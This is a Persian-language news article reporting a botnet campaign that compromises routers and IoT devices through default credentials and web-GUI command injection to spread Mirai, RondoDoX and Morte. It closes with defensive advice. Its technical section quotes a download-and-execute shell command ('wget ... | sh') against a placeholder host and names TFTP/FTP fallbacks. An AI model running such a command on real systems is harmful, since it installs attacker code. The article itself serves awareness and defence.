باتنت جدید، روترها و دستگاههای IoT را هدف قرار میدهد و payloadهای Mirai، RondoDoX و Morte را منتشر میکند.
اخبار داغ فناوری اطلاعات و امنیت شبکهیک عملیات باتنت جدید با مدل «لودِر-بهعنوان-خدمت» شناسایی شده که با سوءاستفاده از رابطهای وب مدیریتیِ روترها و دستگاههای IoT بهصورت خودکار آنها را تسخیر کرده و payloadهایی مانند Mirai، RondoDoX و Morte را منتشر میکند. پژوهشگران لاگها و پنلهای کنترلوفرمان این کمپین را افشا کردهاند و نشان میدهد حمله با ترکیب تلاش نفوذ با اعتبارنامههای پیشفرض و تزریق فرمان در فیلدهای وبGUI انجام میشود. زیرساخت توزیعِ مقاوم و پشتیبانی از چند پروتکل و معماری باعث شده تا این تهدید بسیار مقیاسپذیر و آمادهٔ سوءاستفاده باشد — لذا اقدام فوری برای بهروزرسانی، تغییر رمزهای پیشفرض و محدود کردن دسترسیهای مدیریتی ضروری است.
جزئیات حمله / آسیبپذیریها و هدفها
-
روش اصلی: تزریق فرمان (Command Injection) در فیلدهای وبGUI مدیریتی روترها از طریق پارامترهای POST و تنظیمات مدیریتی مثل NTP، syslog، hostname و صفحات خاصی مانند
wlwps.htmوwan_dyna.html. مهاجمین فرمانهای شل را به ورودیها ارسال میکنند تا دستگاهها را وادار به دانلود و اجرای اسکریپت از راه دور کنند. -
بردار اولیه نفوذ: پروبهای خودکار که تلاش میکنند با استفاده از اعتبارنامههای پیشفرض (مثلاً admin:admin) یا اکانتهای ضعیف وارد شوند؛ پس از ورود اولیه، دستوراتی مانند
wget -qO- http://IP/rondo.*.sh | shاجرا میشوند. -
payloadها و زیرساخت توزیع: پس از نفوذ، دستگاهها اسکریپتها و باینریهایی مانند RondoDoX، نسخههای Mirai و Morte را از سرورهای توزیعشده دانلود و اجرا میکنند. گزارشها آدرسهای IP مرتبط با زیرساخت را نیز فهرست کردهاند.
-
اهداف: عمدتاً روترهای SOHO و دستگاههای IoT با وبGUI آسیبپذیر؛ همچنین تحلیلها نشان میدهد که از برخی CVEهای قدیمی بهعنوان فالوآپ نیز استفاده شده است تا شانس موفقیت افزایش یابد.
توضیح فنی (چطور کار میکند)
-
مهاجمین ورودیهای متنی در صفحات مدیریتی وب را هدف میگیرند و با ارسال رشتههای حاوی فرمان، باعث میشوند دستگاه فرمان را در سطح سیستم اجرا کند؛ این اتفاق وقتی رخ میدهد که ورودیها بهدرستی پاکسازی یا محدود نشده باشند.
-
برای افزایش قابلیت موفقیت و سازگاری با معماریهای مختلف، زنجیرهٔ توزیع از چند مکانیزم استفاده میکند: ابتدا HTTP (
wget/curl) و در صورت ناموفق بودن، پروتکلهای جایگزین مثل TFTP یا FTP (دستوراتtftpیاftpget) بهعنوان fallback بهکار گرفته میشود تا باینری مناسب معماری دانلود شود. این شیوه تضمین میکند payload روی طیف وسیعی از دستگاههای embedded اجرا شود. -
پس از دانلود، ماژولهای fingerprinting اطلاعات دستگاه (MAC، hostname، نسخه firmware، معماری CPU) را جمعآوری میکنند تا تصمیم گرفته شود دستگاه چه نقشی بهعهده بگیرد — شرکت در حملات DDoS، استخراج ارز، یا نگهداری دسترسی برای فروش.
وضعیت فعلی تهدید
-
کمپین حداقل چند ماه فعال بوده و محققان لاگها و پنلهای کنترلوفرمان آن را مشاهده و افشا کردهاند؛ زیرساخت توزیع شامل چندین آدرس IP است که تحمل خطا و پایداری عملیات را افزایش میدهد.
-
در گزارشها اشاره شده که هنوز بهرهبرداریِ گستردهٔ جدید در سطح کاربران نهایی بهصورت عمومی اعلام نشده، اما روش خودکار و زیرساخت آمادهٔ سوءاستفاده است — یعنی در صورتی که مهاجمان هدفگیری را افزایش دهند، سریع گسترش خواهد یافت.
چگونه از خود محافظت کنیم؟ (اقدامات فوری)
-
فوراً firmware روترها و دستگاههای IoT را آپدیت کنید — دستگاههایی که دیگر آپدیت رسمی ندارند باید در اولویت تعویض یا از شبکه جدا شوند.
-
نامکاربری/رمزهای پیشفرض را تغییر دهید و برای مدیریت از پسوردهای قوی و منحصربهفرد استفاده کنید.
-
دسترسی مدیریت از اینترنت را ببندید — صفحات وب مدیریتی را فقط از شبکه مدیریت یا از طریق VPN امن در دسترس قرار دهید؛ مدیریت از WAN را غیرفعال کنید.
-
پروتکلهای ناامن را مسدود کنید — اگر نیاز ندارید، FTP و TFTP را از سمت WAN مسدود کنید تا از دانلودهای fallback مخرب جلوگیری شود.
-
نصب و فعالسازی سیستمهای مانیتورینگ و WAF/IDS — الگوهای command injection و دانلودهای مشکوک را شناسایی و هشدار دهید.
-
قرنطینه و پاکسازی: در صورت شناسایی دستگاههای آلوده (مثلاً ارتباط با IPهای گزارششده یا اجرای اسکریپتهای ناشناس)، دستگاه را از شبکه جدا، لاگها را بررسی و firmware معتبر نصب کنید.
چرا این تهدید مهم است؟
این کمپین نشاندهندهٔ تکامل روشهای مجرمان سایبری است؛ ترکیب یک مدل تجاری (Loader-as-a-Service) با سوءاستفاده از وبGUIهای آسیبپذیر، حمله را خودکار، آسان و مقیاسپذیر کرده است. پشتیبانی از چند پروتکل توزیع و معماریهای مختلف به مهاجمان امکان میدهد طیف گستردهای از دستگاههای متصل به اینترنت را هدف قرار دهند — نتیجهٔ موفقیت این حمله میتواند تبدیل شبکههای خانگی و سازمانی به ناوگان باتنت برای DDoS، استخراج ارز یا فروش دسترسی باشد.
برچسب ها: SocialEngineering , ZeroDay, امنیت_سایبری, phishing, Chrome, Anti-Phishing, Anti Ransomware, هکر, فیشینگ, بدافزار
